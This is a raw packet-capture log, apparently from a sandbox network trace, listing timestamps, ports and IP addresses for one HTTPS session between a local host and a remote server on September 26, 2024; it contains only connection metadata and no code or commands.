Sep 26, 2024 09:23:21.449450016 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.449515104 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.449898005 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.449920893 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.450006008 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.450006008 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.450011015 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.450500965 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.450527906 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.450624943 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.450632095 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.450639963 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.454030991 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.454056025 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.454086065 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.454092979 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.454138041 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.454515934 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.454535007 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.454575062 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.454580069 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.454607010 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.455195904 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.455218077 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.455245018 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.455250025 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.455285072 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.495124102 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.541013956 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.541042089 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.541266918 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.541300058 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.541351080 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.541515112 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.541534901 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.541590929 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.541601896 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.541623116 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.541630983 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.542011023 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.542028904 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.542068005 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.542083025 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.542105913 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.542120934 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.542640924 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.542658091 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.542700052 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.542716026 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.542753935 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.542771101 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.543313026 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.543333054 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.543421030 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.543421984 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.543438911 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.543477058 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.543992043 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.544020891 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.544050932 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.544064999 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.544085979 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.544101000 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.544279099 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.544297934 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.544323921 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.544332981 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.544353962 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.544372082 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.544858932 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.544879913 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.544917107 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.544928074 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.544945955 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.544992924 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.550194025 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.633671045 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.633699894 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.633752108 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.633781910 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.633804083 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.633824110 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.634011030 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.634031057 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.634057045 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.634063959 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.634087086 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.634102106 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.634605885 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.634624004 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.634655952 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.634671926 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.634687901 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.634707928 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.635231018 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.635258913 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.635281086 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.635298014 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.635315895 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.635335922 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.635804892 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.635823965 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.635852098 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.635862112 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.635885000 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.635895967 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.636420012 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.636440039 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.636496067 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.636511087 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.636552095 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.636728048 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.636735916 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.636745930 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.636778116 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.636784077 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.636806011 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.636822939 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.637022972 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.637458086 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.637478113 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.637506008 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.637520075 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.637535095 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.637548923 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.726072073 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.726094961 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.726206064 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.726224899 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.726267099 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.726574898 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.726598024 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.726629972 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.726634979 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.726674080 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.726674080 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.727195024 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.727215052 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.727257967 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.727262974 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.727303982 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.727703094 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.727724075 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.727761030 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.727766037 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.727790117 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.727808952 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.728068113 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.728085995 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.728127003 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.728132010 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.728159904 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.728174925 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.728801966 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.728826046 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.728853941 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.728858948 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.728892088 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.728904963 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.729392052 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.729413033 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.729492903 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.729499102 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.729533911 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.729953051 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.729976892 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.730009079 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.730015039 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.730037928 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.730052948 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.819293976 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.819338083 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.819422007 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.819434881 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.819482088 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.820055962 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.820076942 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.820111036 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.820116997 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.820128918 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.820151091 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.820375919 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.820400000 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.820435047 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.820439100 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.820465088 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.820482969 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.820837975 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.820858002 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.820884943 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.820889950 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.820915937 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.820934057 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.821315050 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.821336031 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.821372986 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.821377993 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.821408987 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.821417093 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.821969032 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.821996927 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.822042942 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.822047949 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.822056055 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.822081089 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.822211027 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.822235107 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.822269917 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.822273970 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.822299957 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.822318077 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.822947025 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.822971106 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.822998047 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.823004007 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.823029995 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.823044062 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.833308935 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.911160946 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.911211967 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.911253929 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.911266088 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.911288977 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.911315918 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.911640882 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.911667109 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.911695957 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.911703110 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.911725044 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.911740065 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.912194014 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.912214041 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.912242889 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.912247896 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.912273884 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.912292004 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.912810087 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.912827969 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.912900925 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.912906885 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.912947893 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.913285971 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.913306952 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.913341999 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.913347006 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.913373947 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.913388014 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.913866043 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.913889885 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.913922071 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.913925886 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.913953066 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.913966894 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.914400101 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.914429903 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.914455891 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.914460897 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.914484024 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.914508104 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.915035009 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.915055990 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.915083885 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.915087938 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:21.915115118 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.915133953 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:21.918379068 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.003870010 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.003941059 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.004089117 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.004117966 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.004133940 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.004162073 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.004369020 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.004417896 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.004447937 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.004456043 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.004481077 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.004498959 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.004806995 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.004853964 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.004863977 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.004880905 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.004890919 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.004920959 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.005393028 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.005435944 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.005448103 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.005455971 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.005481005 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.005497932 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.005899906 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.005955935 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.005970955 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.005978107 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.006004095 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.006019115 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.006753922 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.006795883 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.006818056 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.006825924 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.006846905 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.006864071 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.006964922 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.007003069 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.007015944 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.007026911 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.007054090 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.007070065 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.007266045 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.007675886 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.007721901 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.007740974 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.007746935 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.007775068 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.096195936 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.096235037 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.096343994 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.096359968 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.096400023 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.096739054 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.096769094 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.096800089 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.096805096 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.096833944 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.096847057 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.097349882 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.097373962 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.097404957 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.097409964 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.097455025 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.097455025 CEST	49713	443	192.168.2.6	188.114.97.3
Sep 26, 2024 09:23:22.097857952 CEST	443	49713	188.114.97.3	192.168.2.6
Sep 26, 2024 09:23:22.097879887 CEST	443	49713	188.114.97.3	192.168.2.6
